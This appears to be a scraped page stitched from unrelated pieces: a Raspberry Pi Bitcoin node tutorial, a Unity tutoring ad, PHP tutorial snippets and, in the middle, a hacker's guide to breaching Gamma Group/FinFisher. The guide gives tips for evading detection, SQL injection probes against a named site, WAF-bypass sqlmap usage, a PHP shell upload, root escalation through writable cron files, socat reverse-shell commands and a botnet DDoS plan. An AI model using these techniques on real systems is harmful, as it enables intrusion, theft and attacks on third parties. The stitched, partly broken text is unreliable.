Please have a look at it - I have copied the Headlines in capitals to let you know what I did, and what I skipped. On Tutorial Page: Start with RASPBIAN (OPTIONAL) CONFIG OPTIONS. Set You RasPi up including "EDITING FILES" to save your Layout at the tutorial page and come back here. I skipped the CONFIGURE USB AND SET AUTOMOUNT process, as we are going to use PRUNING to reduce the 120GB to a tiny filesize - so USB Devices are not needed here! It was necessary to ENLARGE SWAP FILE to install bitcoin core - otherwise it didn't went through which ended in a frozen raspi. So have a close look by following the raspnode tutorial at: ENLARGE SWAP FILE. I have my raspi running via cable to router - but you can also WiFi setup everything described under NETWORKING ON THE RASPBERRY PI. Now comes the interesting part: Follow the steps at DOWNLOADING BITCOIN CORE DEPENDENCIES - they work fine for 0.14.0 too. Git should be on Board already when you installed Pixel - otherwise you would need to install it.
sudo apt-get install git -y (only jessy lite)
I skipped the next command lines - as I don't use bitcoin-qt wallet. If you want to use it as wallet - do the step.
as I don't need the wallet functionality. I didn't need to use "MAKE" which saves you maybe up to 2.5 hours. instead you can just go ahead with:
sudo make install
(If I am wrong in doing so - please let me know) The install takes some time - and just a heads up: when it gets stuck somewhere - just redo the installation process - it took three times to went through - stuck at some processing. After the installation took place you can finally get your Raspberry Pi Node running in no time! To test if the the installation went through - you can just start bitcoind using:
than check if everything is working so far:
after a few seconds you should see version: etc... if not, something went wrong. Try to redo the steps in the raspnode tutorial. (don't give up if it failed - retry! Ask your questions here) IMPORTANT: you need to stop bitcoin on your raspberry now!
If you don't need an external USB Drive - what I hope - as we are going to use pruning just go ahead and skip the USB part and create a file inside (or follow the raspnode tutorial on how to setup the USB drive):
cd .bitcoin sudo nano bitcoin.conf
and enter the exact same pruning size you have used on your Desktop Machine to prune. I used 1024 but the minimum is 550. (used 550 for the 8GB SD card on PC and Raspberry)
That's it for the raspi. update: To signal UASF enter in a new line:
Now you have to transfer the two folders CHAINSTATE and BLOCKS from your PC bitcoind directory to your raspberry. I am using a program called "WINSCP" - it is free and easy to use: https://winscp.net/eng/download.php We need this to transfer the files to the Raspberry pi. Pretty sure you can also do it via SSH - but I am the noob. So let's keep it simple. Open Winscp and put in the IP Address of your Raspberry Pi, User and Password (same as in SSH) You should now see the directories on your Raspberry Pi. There is a folder called
enter it and you will see the two folders
blocks & chainstate
you can delete them on the raspberry as they have some data from your previous test inside. Make sure you can also see the bitcoin.conf file in that directory, which needs to contain the exact same prune line, like the one on your desktop machine. If not, make sure to edit it via SSH. The line "datadir=l:\yourfolder" is obviously not needed in the Raspberry bitcoin.conf file. Now grab the two folders CHAINSTATE and BLOCKS from your PC and copy them to your .bitcoind folder. I also copied banlist.dat, fee_estimation.dat, mempool.dat and peers.dat to the folder - not really knowing if needed! Not needed. The whole copy process might take some minutes (against some weeks in the old way). After copying is finished, you can now start bitcoind on the Raspberry.
the & symbol let you still use the command line while the process is running btw. The process - if succesfull - will take some time to finish.
Will give you some informations what is going on right now. When you can see, that it is checking the blocks, this is good! If you get an error - double check - if you have the correct prune size (same as on desktop machine) - in bitcoin.conf and that this file is inside .bitcoin on RaspberryPi. It took me some time, to find my mistakes. Congrats! You are almost a part of the network! To make your node now a fullnode, you will need to go to your router (often 192.168.1.1) and enable portforwarding for your raspberry pi - and open ports 8333 - that's it! You can now go to: https://bitnodes.21.co/nodes/ scroll down to "JOIN THE NETWORK" and check check if your node IP is connected! It will show up as soon as the blocks are checked and the raspi is running. Well done! Now you are running a full node, with a small Blockchain and got it working in Minutes, not weeks! I really hope, my little tutorial worked for you and your are part of the Node network now. If you have problems or I made a mistake in this helper tut, just let me know and I will try to make it better. Have fun and NODL! the noob tl;dr; (if you are a real noob start with the non-tl;dr version!) tl;dr; PART ONE 1) Download & install / setup bitcoincore @ https://bitcoin.org/de/download 2) change dbcache to something smaller than your memory and download the whole Blockchain (120GB). 3) create a file called bitcoin.conf put the line prune=550 (or higher) in to activate pruning on win inside %appData%/bitcoin 4) Open ports 8333 on your Router to make this a full node with a smaller Blockchain. You are running a full node on your PC. tl;dr; PART TWO 1) Install jessie lite and the needed dependencies on your SDCard - Raspberry ( >git clone -b 0.14 https://github.com/bitcoin/bitcoin.git )
see tutorial for more info.
2) create a file called bitcoin.conf inside .bitcoin and add the same prune=Number you had on your PC. 3) transfer the pruned folders BLOCKS and CHAINSTATE to the Raspberry Folder .bitcoin 4)Start "bitcoind &" 5) let everything sync 6) Make sure you have port 8333 opened on your router. You are running a full node on your Raspberry with a super small Blockchain (I put all on a 8GB SDcard) Tip if you want : 19656Uwdwko5RjtnuwQENpjBwE3ChzD59v updated 03/12 - will update more, soon. updated 03/12.2 - I updated the whole process a bit and also added some improvements. updated 03/14/ Added a tl;dr version at the end.
My band trying to use Bitcoin for mp3 downloads. Does it have to be this complicated?
[OFFER] Want to learn how to create your own 3D or 2D game in Unity? I'll tutor you for $12.50/hr, or $25/hr if it cuts into my bedtime.
Pretty much what the title says. I'll teach you how to:
Create a simple game from simple from zero experience,
Help you get grasp with game development, or
Teach you a new genre or a method of crafting a specific game system.
I'll be able to teach you:
How to program in C# and use .NET and Unity
How to create art and sound (assets, basically) for your game
How to actually make your game
Finally, the only prerequisites are:
You need to know what you want to do. Otherwise, I'll just teach you how to make one of the following: An Asteroids, Twin-stick Shooter or Paddle-and-ball game in both 3D and 2D, or something impromptu.
You know how to use a computer
You have Skype or TeamViewer
What I will not do however is:
Code your game for you.
Create assets for you.
Do everything for you.
Provide software licenses for you. Besides, most of the things we're using are free anyway.
The only exception to the above is if you can afford to hire me for $35 USD/hr pre-paid.
Here's the current time for my timezone. Saturday to Monday @ $12.50/hr, anytime between 8 AM and 10 PM. Saturday to Monday @ $25/hr, anytime outside of above. Tuesday to Friday @ $25/hr, anytime between 8PM and midnight, except for Thursdays (up to 11PM) Offer: Go for more than 4 hours in one go (sitting), and every hour after the fourth will be discounted 20%. This will be rebated at the end, or in extra hours of tutoring. Offer: One free hour if you have Credo and go through its process. Only available if you're going to actually buy tutoring hours, and purchase at least four hours. (6 in total for the price of 4) Payments are accepted in Bitcoin, or PayPal (preferred).
.NET 2.0 (Core) to 4.0 (and C#, C++ and Visual Basic)
HTML/CSS (and Web Design)
IT-related stuff (mostly Windows)
Photoshop/Illustrator (and Graphic Design)
Voxel Art (and modelling with voxels)
Acoustica Mixcraft (and Music)
Euphonium, but I do not have a physical one with me at the moment.
Blender (and 3D modelling, compositing, post-processing and texturing)
ZBrush (and sculpting)
Git and various dev-software (plus Atlassian suite)
1 My country's market rate; not yours (about $30-40 USD/hr after conversion rates, so... $35 USD/hr should do the trick)
--1-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. -- 2 -- Staying Safe This is illegal, so you'll need to take same basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. -- 3 -- Mapping out the target Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. -- 4 -- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserve.svn/, webservebackup/, webservephpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tampemodsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! -- 5 -- (fail at) Escalating < got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. -- 6 -- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. -- 7 -- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! -- 8 -- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browsejava/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker. -- 9 -- Resources Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. -- 10 -- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
PHP API for Current Bitcoin Price According to Wikipedia, Bitcoin is a cryptocurrency, a form of electronic cash. Cryptocurrency is basically a digital currency in which encryption techniques are used to regulate the generation of units of currency and verify the transfer of funds, operating independently of a central bank. Linux Apache MySQL PHP + Bitcoin tutorial. For this introduction we assume that you have GNU/Linux server with Apache and PHP and that you wish to interact with the Bitcoin network from a web application. We assume some knowledge of Bitcoin and experience in PHP. While this is written for PHP, the same principles apply for other languages. Xem Practical Cryptography with PHP for Using Bitcoin_clip9 - Dangtoan14288 trên Dailymotion How to build Bitcoin Address and Balance database in mysql or mongodb in our local computer? any tutorials will help me out. Bitcoin Core is programmed to decide which block chain contains valid transactions. The users of Bitcoin Core only accept transactions for that block chain, making it the Bitcoin block chain that everyone else wants to use. For the latest developments related to Bitcoin Core, be sure to visit the project’s official website.
PHP Tutorial (& MySQL) #27 - Rendering Data to the Browser ...
Hey gang, in this PHP tutorial I'll explain one of the many data types in PHP - strings. ----- 🐱💻 🐱💻 Course Links: + Cou... This database tutorial will help beginners understand the basics of database management systems. We use helpful analogies to explain a high-level overview of... Hey gang, in this PHP tutorial I'll show you how to take the data we get from the database and render it to the browser inside our HTML template. How to Create Excel Data Entry Form (No VBA) Super Easy - Duration: 9 ... But how does bitcoin actually work? - Duration: 26:21. 3Blue1Brown Recommended for you. 26:21. 5 Things You Should Never ... Complete #CRUD Operation with #PHP #MySql Database. In this tutorial, we are going to learn how to create PHP CRUD Operation. We will learn how to create, Re...